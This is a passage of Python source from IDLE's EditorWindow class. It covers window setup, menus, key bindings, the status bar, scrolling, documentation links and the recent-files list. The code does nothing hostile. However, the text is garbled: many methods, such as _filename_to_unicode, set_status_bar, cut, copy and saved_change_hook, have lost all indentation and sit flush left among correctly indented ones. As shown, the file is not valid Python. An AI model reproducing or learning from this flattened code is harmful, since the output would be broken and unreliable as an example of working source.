    from idlelib.statusbar import MultiStatusBar
    from idlelib.autocomplete import AutoComplete
    from idlelib.autoexpand import AutoExpand
    from idlelib.calltip import Calltip
    from idlelib.codecontext import CodeContext
    from idlelib.paragraph import FormatParagraph
    from idlelib.parenmatch import ParenMatch
    from idlelib.rstrip import Rstrip
    from idlelib.squeezer import Squeezer
    from idlelib.zoomheight import ZoomHeight

    filesystemencoding = sys.getfilesystemencoding()  # for file names
    # Location of the Python docs; shared by all windows, resolved lazily
    # on first __init__.
    help_url = None
    def __init__(self, flist=None, filename=None, key=None, root=None):
        """Build the editor window: widgets, menus, bindings, extensions.

        flist: file list manager shared across windows (may be None).
        filename: file to load, or None for an untitled buffer.
        key: flist registration key for this window.
        root: Tk root; defaults to flist.root.
        """
        # Delay import: runscript imports pyshell imports EditorWindow.
        from idlelib.runscript import ScriptBinding

        # Resolve the documentation location once, class-wide.
        if EditorWindow.help_url is None:
            dochome = os.path.join(sys.base_prefix, 'Doc', 'index.html')
            if sys.platform.count('linux'):
                # look for html docs in a couple of standard places
                pyver = 'python-docs-' + '%s.%s.%s' % sys.version_info[:3]
                if os.path.isdir('/var/www/html/python/'):  # "python2" rpm
                    dochome = '/var/www/html/python/index.html'
                else:
                    basepath = '/usr/share/doc/'  # standard location
                    dochome = os.path.join(basepath, pyver,
                                           'Doc', 'index.html')
            elif sys.platform[:3] == 'win':
                chmfile = os.path.join(sys.base_prefix, 'Doc',
                                       'Python%s.chm' % _sphinx_version())
                if os.path.isfile(chmfile):
                    dochome = chmfile
            elif sys.platform == 'darwin':
                # documentation may be stored inside a python framework
                dochome = os.path.join(sys.base_prefix,
                        'Resources/English.lproj/Documentation/index.html')
            dochome = os.path.normpath(dochome)
            if os.path.isfile(dochome):
                EditorWindow.help_url = dochome
                if sys.platform == 'darwin':
                    # Safari requires real file:-URLs
                    EditorWindow.help_url = 'file://' + EditorWindow.help_url
            else:
                # No local docs found; fall back to the online docs.
                EditorWindow.help_url = ("https://docs.python.org/%d.%d/"
                                         % sys.version_info[:2])
        self.flist = flist
        root = root or flist.root
        self.root = root
        self.menubar = Menu(root)
        self.top = top = window.ListedToplevel(root, menu=self.menubar)
        if flist:
            self.tkinter_vars = flist.vars
            # self.top.instance_dict makes flist.inversedict available to
            # configdialog.py so it can access all EditorWindow instances
            self.top.instance_dict = flist.inversedict
        else:
            self.tkinter_vars = {}  # keys: Tkinter event names
                                    # values: Tkinter variable instances
            self.top.instance_dict = {}
        self.recent_files_path = os.path.join(
                idleConf.userdir, 'recent-files.lst')

        self.prompt_last_line = ''  # Override in PyShell
        self.text_frame = text_frame = Frame(top)
        self.vbar = vbar = Scrollbar(text_frame, name='vbar')
        self.width = idleConf.GetOption('main', 'EditorWindow',
                                        'width', type='int')
        text_options = {
                'name': 'text',
                'padx': 5,
                'wrap': 'none',
                'highlightthickness': 0,
                'width': self.width,
                'tabstyle': 'wordprocessor',  # new in 8.5
                'height': idleConf.GetOption(
                        'main', 'EditorWindow', 'height', type='int'),
                }
        # Wrap the Text widget so multiple handlers can share one event.
        self.text = text = MultiCallCreator(Text)(text_frame, **text_options)
        self.top.focused_widget = self.text

        self.createmenubar()
        self.apply_bindings()

        self.top.protocol("WM_DELETE_WINDOW", self.close)
        self.top.bind("<<close-window>>", self.close_event)
        if macosx.isAquaTk():
            # Command-W on editor windows doesn't work without this.
            text.bind('<<close-window>>', self.close_event)
            # Some OS X systems have only one mouse button, so use
            # control-click for popup context menus there. For two
            # buttons, AquaTk defines <2> as the right button, not <3>.
            text.bind("<Control-Button-1>", self.right_menu_event)
            text.bind("<2>", self.right_menu_event)
        else:
            # Elsewhere, use right-click for popup menus.
            text.bind("<3>", self.right_menu_event)

        # Wire virtual events to their handler methods.
        text.bind('<MouseWheel>', self.mousescroll)
        text.bind('<Button-4>', self.mousescroll)
        text.bind('<Button-5>', self.mousescroll)
        text.bind("<<cut>>", self.cut)
        text.bind("<<copy>>", self.copy)
        text.bind("<<paste>>", self.paste)
        text.bind("<<center-insert>>", self.center_insert_event)
        text.bind("<<help>>", self.help_dialog)
        text.bind("<<python-docs>>", self.python_docs)
        text.bind("<<about-idle>>", self.about_dialog)
        text.bind("<<open-config-dialog>>", self.config_dialog)
        text.bind("<<open-module>>", self.open_module_event)
        text.bind("<<do-nothing>>", lambda event: "break")
        text.bind("<<select-all>>", self.select_all)
        text.bind("<<remove-selection>>", self.remove_selection)
        text.bind("<<find>>", self.find_event)
        text.bind("<<find-again>>", self.find_again_event)
        text.bind("<<find-in-files>>", self.find_in_files_event)
        text.bind("<<find-selection>>", self.find_selection_event)
        text.bind("<<replace>>", self.replace_event)
        text.bind("<<goto-line>>", self.goto_line_event)
        text.bind("<<smart-backspace>>", self.smart_backspace_event)
        text.bind("<<newline-and-indent>>", self.newline_and_indent_event)
        text.bind("<<smart-indent>>", self.smart_indent_event)
        text.bind("<<indent-region>>", self.indent_region_event)
        text.bind("<<dedent-region>>", self.dedent_region_event)
        text.bind("<<comment-region>>", self.comment_region_event)
        text.bind("<<uncomment-region>>", self.uncomment_region_event)
        text.bind("<<tabify-region>>", self.tabify_region_event)
        text.bind("<<untabify-region>>", self.untabify_region_event)
        text.bind("<<toggle-tabs>>", self.toggle_tabs_event)
        text.bind("<<change-indentwidth>>", self.change_indentwidth_event)
        text.bind("<Left>", self.move_at_edge_if_selection(0))
        text.bind("<Right>", self.move_at_edge_if_selection(1))
        text.bind("<<del-word-left>>", self.del_word_left)
        text.bind("<<del-word-right>>", self.del_word_right)
        text.bind("<<beginning-of-line>>", self.home_callback)

        if flist:
            flist.inversedict[self] = key
            if key:
                flist.dict[key] = self
            text.bind("<<open-new-window>>", self.new_callback)
            text.bind("<<close-all-windows>>", self.flist.close_all_callback)
            text.bind("<<open-class-browser>>", self.open_module_browser)
            text.bind("<<open-path-browser>>", self.open_path_browser)
            text.bind("<<open-turtle-demo>>", self.open_turtle_demo)

        self.set_status_bar()
        vbar['command'] = self.handle_yview
        vbar.pack(side=RIGHT, fill=Y)
        text['yscrollcommand'] = vbar.set
        text['font'] = idleConf.GetFont(self.root, 'main', 'EditorWindow')
        text_frame.pack(side=LEFT, fill=BOTH, expand=1)
        text.pack(side=TOP, fill=BOTH, expand=1)
        text.focus_set()

        # usetabs true  -> literal tab characters are used by indent and
        #                  dedent cmds, possibly mixed with spaces if
        #                  indentwidth is not a multiple of tabwidth,
        #                  which will cause Tabnanny to nag!
        #         false -> tab characters are converted to spaces by indent
        #                  and dedent cmds, and ditto TAB keystrokes
        # Although use-spaces=0 can be configured manually in config-main.def,
        # configuration of tabs v. spaces is not supported in the configuration
        # dialog.  IDLE promotes the preferred Python indentation: use spaces!
        usespaces = idleConf.GetOption('main', 'Indent',
                                       'use-spaces', type='bool')
        self.usetabs = not usespaces

        # tabwidth is the display width of a literal tab character.
        # CAUTION:  telling Tk to use anything other than its default
        # tab setting causes it to use an entirely different tabbing algorithm,
        # treating tab stops as fixed distances from the left margin.
        # Nobody expects this, so for now tabwidth should never be changed.
        self.tabwidth = 8    # must remain 8 until Tk is fixed.

        # indentwidth is the number of screen characters per indent level.
        # The recommended Python indentation is four spaces.
        self.indentwidth = self.tabwidth
        self.set_notabs_indentwidth()

        # If context_use_ps1 is true, parsing searches back for a ps1 line;
        # else searches for a popular (if, def, ...) Python stmt.
        self.context_use_ps1 = False

        # When searching backwards for a reliable place to begin parsing,
        # first start num_context_lines[0] lines back, then
        # num_context_lines[1] lines back if that didn't work, and so on.
        # The last value should be huge (larger than the # of lines in a
        # conceivable file).
        # Making the initial values larger slows things down more often.
        self.num_context_lines = 50, 500, 5000000
        self.per = per = self.Percolator(text)
        self.undo = undo = self.UndoDelegator()
        per.insertfilter(undo)
        text.undo_block_start = undo.undo_block_start
        text.undo_block_stop = undo.undo_block_stop
        undo.set_saved_change_hook(self.saved_change_hook)
        # IOBinding implements file I/O and printing functionality
        self.io = io = self.IOBinding(self)
        io.set_filename_change_hook(self.filename_change_hook)
        self.good_load = False
        self.set_indentation_params(False)
        self.color = None  # initialized below in self.ResetColorizer
        if filename:
            if os.path.exists(filename) and not os.path.isdir(filename):
                if io.loadfile(filename):
                    self.good_load = True
                    is_py_src = self.ispythonsource(filename)
                    self.set_indentation_params(is_py_src)
            else:
                io.set_filename(filename)
                self.good_load = True

        self.ResetColorizer()
        self.saved_change_hook()
        self.update_recent_files_list()
        self.load_extensions()

        # Remember where the dynamic Window-menu entries begin.
        menu = self.menudict.get('window')
        if menu:
            end = menu.index("end")
            if end is None:
                end = -1
            if end >= 0:
                menu.add_separator()
                end = end + 1
            self.wmenu_end = end
            window.register_callback(self.postwindowsmenu)

        # Some abstractions so IDLE extensions are cross-IDE
        self.askyesno = tkMessageBox.askyesno
        self.askinteger = tkSimpleDialog.askinteger
        self.showerror = tkMessageBox.showerror

        # Add pseudoevents for former extension fixed keys.
        # (This probably needs to be done once in the process.)
        text.event_add('<<autocomplete>>', '<Key-Tab>')
        text.event_add('<<try-open-completions>>', '<KeyRelease-period>',
                       '<KeyRelease-slash>', '<KeyRelease-backslash>')
        text.event_add('<<try-open-calltip>>', '<KeyRelease-parenleft>')
        text.event_add('<<refresh-calltip>>', '<KeyRelease-parenright>')
        text.event_add('<<paren-closed>>', '<KeyRelease-parenright>',
                       '<KeyRelease-bracketright>', '<KeyRelease-braceright>')

        # Former extension bindings depends on frame.text being packed
        # (called from self.ResetColorizer()).
        autocomplete = self.AutoComplete(self)
        text.bind("<<autocomplete>>", autocomplete.autocomplete_event)
        text.bind("<<try-open-completions>>",
                  autocomplete.try_open_completions_event)
        text.bind("<<force-open-completions>>",
                  autocomplete.force_open_completions_event)
        text.bind("<<expand-word>>", self.AutoExpand(self).expand_word_event)
        text.bind("<<format-paragraph>>",
                  self.FormatParagraph(self).format_paragraph_event)
        parenmatch = self.ParenMatch(self)
        text.bind("<<flash-paren>>", parenmatch.flash_paren_event)
        text.bind("<<paren-closed>>", parenmatch.paren_closed_event)
        scriptbinding = ScriptBinding(self)
        text.bind("<<check-module>>", scriptbinding.check_module_event)
        text.bind("<<run-module>>", scriptbinding.run_module_event)
        text.bind("<<do-rstrip>>", self.Rstrip(self).do_rstrip)
        ctip = self.Calltip(self)
        text.bind("<<try-open-calltip>>", ctip.try_open_calltip_event)
        # refresh-calltip must come after paren-closed to work right
        text.bind("<<refresh-calltip>>", ctip.refresh_calltip_event)
        text.bind("<<force-open-calltip>>", ctip.force_open_calltip_event)
        text.bind("<<zoom-height>>", self.ZoomHeight(self).zoom_height_event)
        text.bind("<<toggle-code-context>>",
                  self.CodeContext(self).toggle_code_context_event)
        squeezer = self.Squeezer(self)
        text.bind("<<squeeze-current-text>>",
                  squeezer.squeeze_current_text_event)
def _filename_to_unicode(self, filename):
"""Return filename as BMP unicode so diplayable in Tk."""
# Decode bytes to unicode.
if isinstance(filename, bytes):
try:
filename = filename.decode(self.filesystemencoding)
except UnicodeDecodeError:
try:
filename = filename.decode(self.encoding)
except UnicodeDecodeError:
# byte-to-byte conversion
filename = filename.decode('iso8859-1')
# Replace non-BMP char with diamond questionmark.
return re.sub('[\U00010000-\U0010FFFF]', '\ufffd', filename)
def new_callback(self, event):
dirname, basename = self.io.defaultfilename()
self.flist.new(dirname)
return "break"
    def home_callback(self, event):
        """Smart Home: jump to first non-blank char, toggling with column 0.

        With Shift held, extend the selection to the destination instead
        of just moving the cursor.  Control-Home falls through to Tk.
        """
        if (event.state & 4) != 0 and event.keysym == "Home":
            # state&4==Control. If <Control-Home>, use the Tk binding.
            return None
        if self.text.index("iomark") and \
           self.text.compare("iomark", "<=", "insert lineend") and \
           self.text.compare("insert linestart", "<=", "iomark"):
            # In Shell on input line, go to just after prompt
            insertpt = int(self.text.index("iomark").split(".")[1])
        else:
            line = self.text.get("insert linestart", "insert lineend")
            # Find the first non-blank column; all-blank lines use the end.
            for insertpt in range(len(line)):
                if line[insertpt] not in (' ', '\t'):
                    break
            else:
                insertpt = len(line)
            lineat = int(self.text.index("insert").split('.')[1])
            if insertpt == lineat:
                # Already at the first non-blank char: toggle to column 0.
                insertpt = 0
        dest = "insert linestart+" + str(insertpt) + "c"
        if (event.state & 1) == 0:
            # shift was not pressed
            self.text.tag_remove("sel", "1.0", "end")
        else:
            if not self.text.index("sel.first"):
                # there was no previous selection
                self.text.mark_set("my_anchor", "insert")
            else:
                # Anchor at the selection edge farther from the cursor.
                if self.text.compare(self.text.index("sel.first"), "<",
                                     self.text.index("insert")):
                    self.text.mark_set("my_anchor", "sel.first")  # extend back
                else:
                    self.text.mark_set("my_anchor", "sel.last")  # extend forward
            first = self.text.index(dest)
            last = self.text.index("my_anchor")
            if self.text.compare(first, ">", last):
                first, last = last, first
            self.text.tag_remove("sel", "1.0", "end")
            self.text.tag_add("sel", first, last)
        self.text.mark_set("insert", dest)
        self.text.see("insert")
        return "break"
def set_status_bar(self):
self.status_bar = self.MultiStatusBar(self.top)
sep = Frame(self.top, height=1, borderwidth=1, background='grey75')
if sys.platform == "darwin":
# Insert some padding to avoid obscuring some of the statusbar
# by the resize widget.
self.status_bar.set_label('_padding1', ' ', side=RIGHT)
self.status_bar.set_label('column', 'Col: ?', side=RIGHT)
self.status_bar.set_label('line', 'Ln: ?', side=RIGHT)
self.status_bar.pack(side=BOTTOM, fill=X)
sep.pack(side=BOTTOM, fill=X)
self.text.bind("<<set-line-and-column>>", self.set_line_and_column)
self.text.event_add("<<set-line-and-column>>",
"<KeyRelease>", "<ButtonRelease>")
self.text.after_idle(self.set_line_and_column)
def set_line_and_column(self, event=None):
line, column = self.text.index(INSERT).split('.')
self.status_bar.set_label('column', 'Col: %s' % column)
self.status_bar.set_label('line', 'Ln: %s' % line)
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("format", "F_ormat"),
("run", "_Run"),
("options", "_Options"),
("window", "_Window"),
("help", "_Help"),
]
    def createmenubar(self):
        """Populate the menubar from menu_specs and fill in the entries.

        Also inserts the application menu on Carbon Tk, the Recent Files
        cascade under File, and the extra Help entries.
        """
        mbar = self.menubar
        self.menudict = menudict = {}
        for name, label in self.menu_specs:
            underline, label = prepstr(label)
            menudict[name] = menu = Menu(mbar, name=name, tearoff=0)
            mbar.add_cascade(label=label, menu=menu, underline=underline)
        if macosx.isCarbonTk():
            # Insert the application menu
            menudict['application'] = menu = Menu(mbar, name='apple',
                                                  tearoff=0)
            mbar.add_cascade(label='IDLE', menu=menu)
        self.fill_menus()
        self.recent_files_menu = Menu(self.menubar, tearoff=0)
        self.menudict['file'].insert_cascade(3, label='Recent Files',
                                             underline=0,
                                             menu=self.recent_files_menu)
        # Remember where the built-in Help entries end so extra ones can
        # be rebuilt later (see reset_help_menu_entries).
        self.base_helpmenu_length = self.menudict['help'].index(END)
        self.reset_help_menu_entries()
def postwindowsmenu(self):
# Only called when Window menu exists
menu = self.menudict['window']
end = menu.index("end")
if end is None:
end = -1
if end > self.wmenu_end:
menu.delete(self.wmenu_end+1, end)
window.add_windows_to_menu(menu)
def update_menu_label(self, menu, index, label):
"Update label for menu item at index."
menuitem = self.menudict[menu]
menuitem.entryconfig(index, label=label)
def update_menu_state(self, menu, index, state):
"Update state for menu item at index."
menuitem = self.menudict[menu]
menuitem.entryconfig(index, state=state)
def handle_yview(self, event, *args):
"Handle scrollbar."
if event == 'moveto':
fraction = float(args[0])
lines = (round(self.getlineno('end') * fraction) -
self.getlineno('@0,0'))
event = 'scroll'
args = (lines, 'units')
self.text.yview(event, *args)
return 'break'
    def mousescroll(self, event):
        """Handle scrollwheel event.

        For wheel up, event.delta = 120*n on Windows, -1*n on darwin,
        where n can be > 1 if one scrolls fast.  Flicking the wheel
        generates up to maybe 20 events with n up to 10 or more.
        Macs use wheel down (delta = 1*n) to scroll up, so positive
        delta means to scroll up on both systems.

        X-11 sends Control-Button-4 event instead.
        """
        # Map either event flavor to an up/down decision.
        up = {EventType.MouseWheel: event.delta > 0,
              EventType.Button: event.num == 4}
        lines = -5 if up[event.type] else 5
        self.text.yview_scroll(lines, 'units')
        return 'break'
    rmenu = None  # Context menu, built lazily by make_rmenu.

    def right_menu_event(self, event):
        "Move the cursor to the click point and post the context menu."
        self.text.mark_set("insert", "@%d,%d" % (event.x, event.y))
        if not self.rmenu:
            self.make_rmenu()
        rmenu = self.rmenu
        self.event = event
        iswin = sys.platform[:3] == 'win'
        if iswin:
            self.text.config(cursor="arrow")

        # Enable/disable entries according to their state-check methods.
        for item in self.rmenu_specs:
            try:
                label, eventname, verify_state = item
            except ValueError:  # see issue1207589
                # Two-element spec: no state check for this entry.
                continue
            if verify_state is None:
                continue
            state = getattr(self, verify_state)()
            rmenu.entryconfigure(label, state=state)

        rmenu.tk_popup(event.x_root, event.y_root)
        if iswin:
            self.text.config(cursor="ibeam")
        return "break"
rmenu_specs = [
# ("Label", "<<virtual-event>>", "statefuncname"), ...
("Close", "<<close-window>>", None), # Example
]
def make_rmenu(self):
rmenu = Menu(self.text, tearoff=0)
for item in self.rmenu_specs:
label, eventname = item[0], item[1]
if label is not None:
def command(text=self.text, eventname=eventname):
text.event_generate(eventname)
rmenu.add_command(label=label, command=command)
else:
rmenu.add_separator()
self.rmenu = rmenu
def rmenu_check_cut(self):
return self.rmenu_check_copy()
def rmenu_check_copy(self):
try:
indx = self.text.index('sel.first')
except TclError:
return 'disabled'
else:
return 'normal' if indx else 'disabled'
def rmenu_check_paste(self):
try:
self.text.tk.call('tk::GetSelection', self.text, 'CLIPBOARD')
except TclError:
return 'disabled'
else:
return 'normal'
def about_dialog(self, event=None):
"Handle Help 'About IDLE' event."
# Synchronize with macosx.overrideRootMenu.about_dialog.
help_about.AboutDialog(self.top)
return "break"
def config_dialog(self, event=None):
"Handle Options 'Configure IDLE' event."
# Synchronize with macosx.overrideRootMenu.config_dialog.
configdialog.ConfigDialog(self.top,'Settings')
return "break"
def help_dialog(self, event=None):
"Handle Help 'IDLE Help' event."
# Synchronize with macosx.overrideRootMenu.help_dialog.
if self.root:
parent = self.root
else:
parent = self.top
help.show_idlehelp(parent)
return "break"
def python_docs(self, event=None):
if sys.platform[:3] == 'win':
try:
os.startfile(self.help_url)
except OSError as why:
tkMessageBox.showerror(title='Document Start Failure',
message=str(why), parent=self.text)
else:
webbrowser.open(self.help_url)
return "break"
def cut(self,event):
self.text.event_generate("<<Cut>>")
return "break"
def copy(self,event):
if not self.text.tag_ranges("sel"):
# There is no selection, so do nothing and maybe interrupt.
return None
self.text.event_generate("<<Copy>>")
return "break"
def paste(self,event):
self.text.event_generate("<<Paste>>")
self.text.see("insert")
return "break"
def select_all(self, event=None):
self.text.tag_add("sel", "1.0", "end-1c")
self.text.mark_set("insert", "1.0")
self.text.see("insert")
return "break"
def remove_selection(self, event=None):
self.text.tag_remove("sel", "1.0", "end")
self.text.see("insert")
return "break"
    def move_at_edge_if_selection(self, edge_index):
        """Cursor move begins at start or end of selection

        When a left/right cursor key is pressed create and return to Tkinter a
        function which causes a cursor move from the associated edge of the
        selection.

        edge_index: 0 for the left edge (sel.first), 1 for the right
        edge (sel.last), per edges_table below.
        """
        # Bind lookups once; the returned closure is called per keypress.
        self_text_index = self.text.index
        self_text_mark_set = self.text.mark_set
        edges_table = ("sel.first+1c", "sel.last-1c")

        def move_at_edge(event):
            if (event.state & 5) == 0:  # no shift(==1) or control(==4) pressed
                try:
                    # Raises TclError when there is no selection.
                    self_text_index("sel.first")
                    self_text_mark_set("insert", edges_table[edge_index])
                except TclError:
                    pass
        return move_at_edge
def del_word_left(self, event):
self.text.event_generate('<Meta-Delete>')
return "break"
def del_word_right(self, event):
self.text.event_generate('<Meta-d>')
return "break"
def find_event(self, event):
search.find(self.text)
return "break"
def find_again_event(self, event):
search.find_again(self.text)
return "break"
def find_selection_event(self, event):
search.find_selection(self.text)
return "break"
def find_in_files_event(self, event):
grep.grep(self.text, self.io, self.flist)
return "break"
def replace_event(self, event):
replace.replace(self.text)
return "break"
def goto_line_event(self, event):
text = self.text
lineno = tkSimpleDialog.askinteger("Goto",
"Go to line number:",parent=text)
if lineno is None:
return "break"
if lineno <= 0:
text.bell()
return "break"
text.mark_set("insert", "%d.0" % lineno)
text.see("insert")
return "break"
def open_module(self):
"""Get module name from user and open it.
Return module path or None for calls by open_module_browser
when latter is not invoked in named editor window.
"""
# XXX This, open_module_browser, and open_path_browser
# would fit better in iomenu.IOBinding.
try:
name = self.text.get("sel.first", "sel.last").strip()
except TclError:
name = ''
file_path = query.ModuleName(
self.text, "Open Module",
"Enter the name of a Python module\n"
"to search on sys.path and open:",
name).result
if file_path is not None:
if self.flist:
self.flist.open(file_path)
else:
self.io.loadfile(file_path)
return file_path
def open_module_event(self, event):
self.open_module()
return "break"
def open_module_browser(self, event=None):
filename = self.io.filename
if not (self.__class__.__name__ == 'PyShellEditorWindow'
and filename):
filename = self.open_module()
if filename is None:
return "break"
from idlelib import browser
browser.ModuleBrowser(self.root, filename)
return "break"
def open_path_browser(self, event=None):
from idlelib import pathbrowser
pathbrowser.PathBrowser(self.root)
return "break"
def open_turtle_demo(self, event = None):
import subprocess
cmd = [sys.executable,
'-c',
'from turtledemo.__main__ import main; main()']
subprocess.Popen(cmd, shell=False)
return "break"
def gotoline(self, lineno):
if lineno is not None and lineno > 0:
self.text.mark_set("insert", "%d.0" % lineno)
self.text.tag_remove("sel", "1.0", "end")
self.text.tag_add("sel", "insert", "insert +1l")
self.center()
def ispythonsource(self, filename):
if not filename or os.path.isdir(filename):
return True
base, ext = os.path.splitext(os.path.basename(filename))
if os.path.normcase(ext) in (".py", ".pyw"):
return True
line = self.text.get('1.0', '1.0 lineend')
return line.startswith('#!') and 'python' in line
def close_hook(self):
if self.flist:
self.flist.unregister_maybe_terminate(self)
self.flist = None
def set_close_hook(self, close_hook):
self.close_hook = close_hook
def filename_change_hook(self):
if self.flist:
self.flist.filename_changed_edit(self)
self.saved_change_hook()
self.top.update_windowlist_registry(self)
self.ResetColorizer()
    def _addcolorizer(self):
        # Install a syntax colorizer for Python source files.
        if self.color:
            return
        if self.ispythonsource(self.io.filename):
            self.color = self.ColorDelegator()
        # can add more colorizers here...
        if self.color:
            # NOTE(review): undo is removed and re-inserted so that it ends
            # up above the colorizer in the percolator chain -- presumably
            # so undo sees edits before coloring does; confirm before
            # changing this order.
            self.per.removefilter(self.undo)
            self.per.insertfilter(self.color)
            self.per.insertfilter(self.undo)

    def _rmcolorizer(self):
        # Remove the colorizer and its tags from the percolator chain.
        if not self.color:
            return
        self.color.removecolors()
        self.per.removefilter(self.color)
        self.color = None

    def ResetColorizer(self):
        "Update the color theme"
        # Called from self.filename_change_hook and from configdialog.py
        self._rmcolorizer()
        self._addcolorizer()
        EditorWindow.color_config(self.text)
    # Characters considered part of an identifier when extending the
    # ERROR tag backwards in colorize_syntax_error.
    IDENTCHARS = string.ascii_letters + string.digits + "_"

    def colorize_syntax_error(self, text, pos):
        "Tag the error location (and enclosing identifier) and move there."
        text.tag_add("ERROR", pos)
        char = text.get(pos)
        if char and char in self.IDENTCHARS:
            # Extend the tag back to the start of the identifier.
            text.tag_add("ERROR", pos + " wordstart", pos)
        if '\n' == text.get(pos):   # error at line end
            text.mark_set("insert", pos)
        else:
            text.mark_set("insert", pos + "+1c")
        text.see(pos)
def ResetFont(self):
"Update the text widgets' font if it is changed"
# Called from configdialog.py
self.text['font'] = idleConf.GetFont(self.root, 'main','EditorWindow')
def RemoveKeybindings(self):
"Remove the keybindings before they are changed."
# Called from configdialog.py
self.mainmenu.default_keydefs = keydefs = idleConf.GetCurrentKeySet()
for event, keylist in keydefs.items():
self.text.event_delete(event, *keylist)
for extensionName in self.get_standard_extension_names():
xkeydefs = idleConf.GetExtensionBindings(extensionName)
if xkeydefs:
for event, keylist in xkeydefs.items():
self.text.event_delete(event, *keylist)
    def ApplyKeybindings(self):
        "Update the keybindings after they are changed"
        # Called from configdialog.py
        self.mainmenu.default_keydefs = keydefs = idleConf.GetCurrentKeySet()
        self.apply_bindings()
        for extensionName in self.get_standard_extension_names():
            xkeydefs = idleConf.GetExtensionBindings(extensionName)
            if xkeydefs:
                self.apply_bindings(xkeydefs)
        # update menu accelerators
        # Build {menu key: {item label: virtual event}} from menudefs.
        menuEventDict = {}
        for menu in self.mainmenu.menudefs:
            menuEventDict[menu[0]] = {}
            for item in menu[1]:
                if item:
                    menuEventDict[menu[0]][prepstr(item[0])[1]] = item[1]
        # Walk every menu entry that already shows an accelerator and
        # refresh it from the new key set.
        for menubarItem in self.menudict:
            menu = self.menudict[menubarItem]
            end = menu.index(END)
            if end is None:
                # Skip empty menus
                continue
            end += 1
            for index in range(0, end):
                if menu.type(index) == 'command':
                    accel = menu.entrycget(index, 'accelerator')
                    if accel:
                        itemName = menu.entrycget(index, 'label')
                        event = ''
                        if menubarItem in menuEventDict:
                            if itemName in menuEventDict[menubarItem]:
                                event = menuEventDict[menubarItem][itemName]
                        if event:
                            accel = get_accelerator(keydefs, event)
                            menu.entryconfig(index, accelerator=accel)
def set_notabs_indentwidth(self):
"Update the indentwidth if changed and not using tabs in this window"
# Called from configdialog.py
if not self.usetabs:
self.indentwidth = idleConf.GetOption('main', 'Indent','num-spaces',
type='int')
    def reset_help_menu_entries(self):
        "Update the additional help entries on the Help menu"
        help_list = idleConf.GetAllExtraHelpSourcesList()
        helpmenu = self.menudict['help']
        # first delete the extra help entries, if any
        helpmenu_length = helpmenu.index(END)
        if helpmenu_length > self.base_helpmenu_length:
            helpmenu.delete((self.base_helpmenu_length + 1), helpmenu_length)
        # then rebuild them
        if help_list:
            helpmenu.add_separator()
            for entry in help_list:
                # entry is (label, file-or-url, ...); freeze the target
                # per entry via the closure factory below.
                cmd = self.__extra_help_callback(entry[1])
                helpmenu.add_command(label=entry[0], command=cmd)
        # and update the menu dictionary
        self.menudict['help'] = helpmenu

    def __extra_help_callback(self, helpfile):
        "Create a callback with the helpfile value frozen at definition time"
        def display_extra_help(helpfile=helpfile):
            if not helpfile.startswith(('www', 'http')):
                # Local file: normalize the path for the platform.
                helpfile = os.path.normpath(helpfile)
            if sys.platform[:3] == 'win':
                try:
                    os.startfile(helpfile)
                except OSError as why:
                    tkMessageBox.showerror(title='Document Start Failure',
                                           message=str(why), parent=self.text)
            else:
                webbrowser.open(helpfile)
        return display_extra_help
    def update_recent_files_list(self, new_file=None):
        "Load and update the recent files list and menus"
        rf_list = []
        if os.path.exists(self.recent_files_path):
            with open(self.recent_files_path, 'r',
                      encoding='utf_8', errors='replace') as rf_list_file:
                rf_list = rf_list_file.readlines()
        if new_file:
            new_file = os.path.abspath(new_file) + '\n'
            if new_file in rf_list:
                rf_list.remove(new_file)  # move to top
            rf_list.insert(0, new_file)
        # clean and save the recent files list
        # Drop entries with NULs or whose file no longer exists; each
        # entry carries a trailing newline, hence path[0:-1].
        bad_paths = []
        for path in rf_list:
            if '\0' in path or not os.path.exists(path[0:-1]):
                bad_paths.append(path)
        rf_list = [path for path in rf_list if path not in bad_paths]
        ulchars = "1234567890ABCDEFGHIJK"
        # Keep at most one entry per available underline character.
        rf_list = rf_list[0:len(ulchars)]
        try:
            with open(self.recent_files_path, 'w',
                      encoding='utf_8', errors='replace') as rf_file:
                rf_file.writelines(rf_list)
        except OSError as err:
            # Warn only once per process about an unwritable list file.
            if not getattr(self.root, "recentfilelist_error_displayed", False):
                self.root.recentfilelist_error_displayed = True
                tkMessageBox.showwarning(title='IDLE Warning',
                        message="Cannot update File menu Recent Files list. "
                                "Your operating system says:\n%s\n"
                                "Select OK and IDLE will continue without updating."
                            % self._filename_to_unicode(str(err)),
                        parent=self.text)
        # for each edit window instance, construct the recent files menu
        for instance in self.top.instance_dict:
            menu = instance.recent_files_menu
            menu.delete(0, END)  # clear, and rebuild:
            for i, file_name in enumerate(rf_list):
                file_name = file_name.rstrip()  # zap \n
                # make unicode string to display non-ASCII chars correctly
                ufile_name = self._filename_to_unicode(file_name)
                callback = instance.__recent_file_callback(file_name)
                menu.add_command(label=ulchars[i] + " " + ufile_name,
                                 command=callback,
                                 underline=0)

    def __recent_file_callback(self, file_name):
        # Freeze file_name per menu entry via a default argument.
        def open_recent_file(fn_closure=file_name):
            self.io.open(editFile=fn_closure)
        return open_recent_file
def saved_change_hook(self):
short = self.short_title()
long = self.long_title()
if short and long:
title = short + " - " + long + _py_version
elif short:
title = short
elif long:
title = long
else:
title = "Untitled"
icon = short or long or title
if not self.get_saved():
title = "*%s*" % title
icon = "*%s" % icon
self.top.wm_title(title)
self.top.wm_iconname(icon)
def get_saved(self):
return self.undo.get_saved()
def set_saved(self, flag):
self.undo.set_saved(flag)
def reset_undo(self):
self.undo.reset_undo()
def short_title(self):
filename = self.io.filename
if filename:
filename = os.path.basename(filename)
else:
filename = "Untitled"
# return unicode string to display non-ASCII chars correctly
return self._filename_to_unicode(filename)
def long_title(self):
# return unicode string to display non-ASCII chars correctly
return self._filename_to_unicode(self.io.filename or "")
def center_insert_event(self, event):
self.center()
return "break"
def center(self, mark="insert"):
text = self.text
top, bot = self.getwindowlines()
lineno = self.getlineno(mark)
height = bot - top
newtop = max(1, lineno - height//2)
text.yview(float(newtop))
def getwindowlines(self):
text = self.text
top = self.getlineno("@0,0")
bot = self.getlineno("@0,65535")
if top == bot and text.winfo_height() == 1:
# Geometry manager hasn't run yet
height = int(text['height'])
bot = top + height - 1
return top, bot
def getlineno(self, mark="insert"):
text = self.text
return int(float(text.index(mark)))
def get_geometry(self):
"Return (width, height, x, y)"
geom = self.top.wm_geometry()
m = re.match(r"(\d+)x(\d+)\+(-?\d+)\+(-?\d+)", geom)
return list(map(int, m.groups()))
def close_event(self, event):
self.close()
return "break"
def maybesave(self):
if self.io:
if not self.get_saved():
if self.top.state()!='normal':
self.top.deiconify()
self.top.lower()
self.top.lift()
return self.io.maybesave()
